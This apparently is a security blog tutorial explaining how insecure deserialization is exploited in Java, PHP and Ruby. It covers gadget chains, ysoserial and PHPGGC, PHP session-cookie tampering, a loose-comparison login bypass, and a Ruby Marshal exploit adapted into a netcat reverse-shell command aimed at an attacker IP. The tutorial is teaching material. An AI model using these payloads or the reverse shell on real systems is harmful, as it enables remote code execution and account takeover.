In this [article](https://binaryte.com/blog/identifying-and-understanding- insecure-deserialization-vulnerability), we have talked a lot about the serialization and deserialization process and how we can identify the serialization process in many languages. Today, we are going to talk about how this vulnerability can be exploited from the attacker standpoint.
In web development, serialization is often used for session management, which is essential for many web applications to maintain stateful interactions with users. By serializing user information or using an identifier, the server can identify currently active users by checking their information or IDs.
In a clustered environment, where multiple servers are involved in handling requests, session management becomes more complex. One approach is to use a reverse proxy with load balancing capability, which distributes incoming requests among multiple servers based on various algorithms. In this scenario, serialization can be used to ensure that session data is consistent across all servers in the cluster. By serializing the session information and storing it in a shared database or cache, any server in the cluster can access and update the session data as needed
However, if this serialization process is not implemented securely, it can create vulnerabilities that attackers can exploit. The specific ways to exploit these vulnerabilities may vary depending on the programming language used by the target, so it’s important to understand the specifics for each language. Therefore, we will explore the unique aspects of insecure deserialization for each language.
Exploiting Java-based deserialization
While working with Java deserialization, you will need a tool called “ysoserial”. Before going into this, let’s get to understand what the gadget chain is and how the attacker could take advantage of it.
The concept of gadget & gadget chain
In cyber security, a gadget is a snippet or small piece of code that can be used to work on specific operations on a larger system. Multiple pieces of these code (gadgets) can be linked together to create more complex attacks. This is what is referred to as a gadget chain.
For example, the attacker may use the vulnerability in the system to execute the code crafted by the attacker. He/she may use the first gadget to do the job. Probably, the attacker may not only use one, but two or other three gadgets with different purposes. The second gadget may be used for escalating his/her privileges and the third one is used for stealing particular data from the remote server.
However, a gadget chain is not something that the attacker can deliberately craft but instead, it uses the code that already exists in the website. The common practice to do this is by using the existing magic method (which will be explained later) that is doing a particular thing. In this case, the attacker may only be able to manipulate the data being executed by the method, but not the method itself. Because of this, the attacker would need the actual source code and take action accordingly (e.g. magic method that allows removal of certain objects might also be usable to delete other data that the code is not intended to).
ysoserial
Despite this, the web developer may use libraries with pre-built gadget chains. These libraries make it possible for the attacker to exploit insecure deserialization vulnerabilities. In Java, we can use a tool called “ysoserial” to do this. While knowing which libraries are used by websites may help to make things easier, it isn’t really required. The attacker may simply do some trial and error on some available libraries with this tool without having to create the gadget chains manually.
At first, the attacker would select a suitable gadget chain for the target such as Apache Commons Collections 4 Library. Assuming the target is using this library, this chain contains a HashedMap gadget that is used to construct a new empty map and is vulnerable to deserialization attack. The tool will try to generate a payload which will be executed on the victim’s system. It also lets the attacker craft his/her own payload so the generated serialized object will contain the attacker payload as well. This payload then will be the data to be executed on the target’s website or system, allowing specific actions defined by the attacker to be executed.
Exploiting PHP-based deserialization
In a previous article, we have already learned what the serialization in PHP looks like. To summarize, it is in the human-readable format, containing several pieces of information as follows.
Data types | Format |
---|---|
Sring | s:size:value; |
Integer | i:value; |
Boolean | b:value; (1 for true, 0 for false) |
Null | N; |
Array | a:size:{key of first attribute;value of first attribute;…next key |
attribute and value}
Object| O:str length:object name:numbers of attributes:{key of first
attribute;value of first attribute;…next key attribute and value}
Manipulating serialization object
Exploiting PHP serialization information can be done by manipulating some
aspects. The easiest one should be manipulating the serialization object
itself. It can be as simple as changing the data to something we want. As we
are working with the readable serialization object, the developer may contain
information like the username and login status (e.g.
…s:8:”username”:s:4:”Brad”;s:8:isActive:b:1;}
) in the session cookie.
Probably, it won’t be so obvious, as the developer may have encoded it first.
If the attacker can decode this in session cookie and deliberately change the
username information, the server may allow the attacker to access another
registered username by changing the username value to something like
…s:8:”username”:s:4:”John”;s:8:isActive:b:1;}
. With a very simple approach,
implementing serialization on user controllable-data could lead to severe
consequences and at the same time exposing an even bigger attack surface for
insecure deserialization vulnerability.
Unexpected loose comparison result
Every programming language has its own flaws and PHP is no exception. In PHP, two different data types can be compared with loose comparison (==) and strict comparison (===). Taking advantage of how PHP’s loose comparison operator behaves is another way to exploit this kind of vulnerability. When performing loose comparison PHP will convert string to integer. For example, if you try to compare two different data types like the following, it will evaluate it to be true.
var_dump( 5 == “5”);
bool(true)
Weirdly, in the earlier version of PHP, if you try to add some value into the
string, PHP will still return a true value. PHP evaluates this value 5 == “5 some value”
as true and the value is treated the same way as 5 == “5”
. In
other words, the rest of the added string is completely ignored. Even weirder,
0 == “any string”
is considered true. The “any string” is converted to
integer 0 as it contains no number and true is returned as a result.
No, consider this. In the serialized object information, the developers may
insert the access token or even worse the user’s password. The decoded
serialized object in cookies looks like this
…s:8:”username”:s:4:”Brad”;s:8:password:s:14:secretpassword;}
. The website
uses loose comparison to compare the unserialized cookie with password in the
database to let the users log in.
if (unserialize($_COOKIE[“password”]) == $password) {
// User login successfully
}
Because we know how PHP may interpret this, the attacker may deliberately
change the serialized object to something like this
…s:8:”username”:s:4:”Brad”;s:8:password:i:0;}
. Following the same logic we
have discussed earlier, this new condition would always return true, allowing
the attacker to bypass the authentication.
However, it is only possible because the deserialization process preserved the data type. It won’t work if the developer tries to directly fetch the password value, hence the returned value would be false. When this article is written (PHP 8.1), these behaviors have been fixed as it can lead to security exploits. Despite this, many websites out there still use an outdated version of PHP with this vulnerability and therefore prone to this kind of exploit.
Magic methods
In many languages, the term “magic methods” refers to the special method with
double underscore (**) prefixes. In Object-Oriented Programming, a widely used
concept is the magic method, such as Python’s **init**()
method, which is
analogous to**construct()
in PHP. These methods are automatically triggered
whenever a new object is created.
The vulnerability does not lie within the magic method itself. Rather, the risk arises when the attacker is able to control the data that invokes or executes this magic method. In such a scenario, the source of the threat could be the deserialized object itself.
In some cases, the attacker may gain access to the actual source code through directory listing. By doing so, he/she might be able to study the code and identify the available classes. These classes may contain the deserialization magic method with dangerous operation. Taking information from the source code, the attacker may change the original serialized object data with the variable or information from the source code, and let the deserialization process do the jobs on behalf of the attacker.
PHPGGC (PHP Generic Gadget Chain)
PHPGGC is equivalent to ysoserial tool in Java. In other words, it is a POC (Proof of Concept) tool that works on deserialization in PHP. Put simply, it uses the gadget chains from known libraries or frameworks to run arbitrary code. You can see more detailed information from this Github repository.
In addition to PHP deserialization, sometimes it is also possible to exploit
deserialization vulnerabilities even without the need of the unserialize()
method. It can be done by using PHP file archive (PHAR), which requires the
attacker to upload the file to the target server. It is a more advanced
technique and we won’t go further into this for now.
Exploiting Ruby-based deserialization
Unlike Java and PHP, Ruby has no tool for exploiting known gadget chains, at least when this article is written. However, you still can find the code to achieve the goal. As you are going to work with the code, your basic understanding of the code (Ruby) is still required.
While looking for the exploit for Ruby deserialization, I found a very interesting exploit which you can find here which works on Ruby version 2.6.3 or lower.
This exploit takes advantage of the ERB class which by default, is used as a templating system. ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new is a constructor method call that creates a new instance of the DeprecatedInstanceVariableProxy class, which is defined in the ActiveSupport::Deprecation module of the Ruby on Rails framework. This class is used to wrap another object, such as an ERB object in the code, and provide a way to access its instance variables.
In the exploit code, the very first line is written as code = ‘touch /tmp/rce’
. Quite similar to ysoserial, you can change it to your custom
payload. For example, you can change it to something like this:
code = ‘nc -nv 172.19.0.10 44 -e /bin/bash’
This code is basically doing a reverse shell, where the above IP address is directed to the attacker’s machine. When doing this, you also need to listen to the corresponding port, which has been explained in more detail here. Our payload will then be “marshalled” by the code and the generated payload should be placed in the URL path mentioned in the exploit code.
Conclusion
Note that insecure deserialization can lead to RCE or even allows the attacker to create a reverse shell connection into the victim’s system. In a deserialization attack, the attacker crafts a specially crafted payload that can bypass the input validation checks and exploit the deserialization process to execute arbitrary code. Since deserialization is a fundamental part of many modern web applications, it is important to be aware of the risks associated with this process and implement proper mitigation techniques to prevent deserialization vulnerabilities.